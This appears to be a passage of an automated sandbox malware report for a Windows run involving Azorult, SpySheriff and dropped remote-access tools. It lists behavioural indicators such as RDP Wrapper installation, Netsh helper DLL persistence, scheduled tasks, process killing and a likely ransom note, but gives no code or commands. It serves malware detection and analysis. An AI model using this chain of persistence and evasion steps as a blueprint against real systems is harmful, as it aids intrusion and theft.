File opened for modification C:\Program Files (x86)\Kaspersky Lab C:\Users\Admin\Downloads\Azorult.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_84579926\manifest.fingerprint C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_933065173\deny_domains.list C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_933065173\deny_full_domains.list C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_976953327\manifest.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Program Files\RDP Wrapper\rdpwrap.dll C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Program Files\AVG C:\Users\Admin\Downloads\Azorult.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_84579926\classification.js C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_84579926\travel-facilitated-booking-bing.js C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1559524024\manifest.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1715725482\manifest.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1715725482\protocols.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_2031229069\manifest.fingerprint C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\RDP Wrapper\rdpwrap.ini C:\rdp\RDPWInst.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\SYSTEM32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\SYSTEM32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\SYSTEM32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

Permission Groups Discovery: Local Groups

discovery

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\SpySheriff.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\regedit.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\rdp\Rar.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\attrib.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\rdp\RDPWInst.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\SpySheriff.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\programdata\microsoft\intel\R8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\regsvr32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\ProgramData\Windows\winit.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\ProgramData\Windows\winit.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Gathers network information

Description Indicator Process Target
N/A N/A C:\Windows\system32\ipconfig.exe N/A

Kills process with taskkill

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133921237954079128" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset C:\ProgramData\Windows\winit.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage C:\ProgramData\Windows\winit.exe N/A
Key created \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000_Classes\Local Settings C:\programdata\microsoft\intel\R8.exe N/A
Key created \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000_Classes\Local Settings C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000_Classes\Local Settings C:\ProgramData\Microsoft\Intel\wini.exe N/A
Key created \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000_Classes\Local Settings C:\Windows\SysWOW64\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-186956858-2143653872-2609589082-1000\{BA141F2C-3A75-459F-A01F-78DB12628BC1} C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000_Classes\MIME\Database C:\ProgramData\Windows\winit.exe N/A

NTFS ADS

Description Indicator Process Target
File opened for modification C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\root\CIMV2 C:\Programdata\RealtekHD\taskhostw.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Runs .reg file with regedit

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A

Runs net.exe

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\Downloads\Azorult.exe N/A
N/A N/A C:\Users\Admin\Downloads\Azorult.exe N/A
N/A N/A C:\Users\Admin\Downloads\Azorult.exe N/A
N/A N/A C:\Users\Admin\Downloads\Azorult.exe N/A
N/A N/A C:\Users\Admin\Downloads\Azorult.exe N/A
N/A N/A C:\Users\Admin\Downloads\Azorult.exe N/A
N/A N/A C:\Users\Admin\Downloads\Azorult.exe N/A
N/A N/A C:\Users\Admin\Downloads\Azorult.exe N/A
N/A N/A C:\Users\Admin\Downloads\Azorult.exe N/A
N/A N/A C:\Users\Admin\Downloads\Azorult.exe N/A
N/A N/A C:\Users\Admin\Downloads\Azorult.exe N/A
N/A N/A C:\Users\Admin\Downloads\Azorult.exe N/A
N/A N/A C:\Users\Admin\Downloads\Azorult.exe N/A
N/A N/A C:\Users\Admin\Downloads\Azorult.exe N/A
N/A N/A C:\Users\Admin\Downloads\Azorult.exe N/A
N/A N/A C:\Users\Admin\Downloads\Azorult.exe N/A
N/A N/A C:\Users\Admin\Downloads\Azorult.exe N/A
N/A N/A C:\Users\Admin\Downloads\Azorult.exe N/A
N/A N/A C:\Users\Admin\Downloads\Azorult.exe N/A
N/A N/A C:\Users\Admin\Downloads\Azorult.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rfusclient.exe N/A
N/A N/A C:\ProgramData\Windows\rfusclient.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Programdata\RealtekHD\taskhostw.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
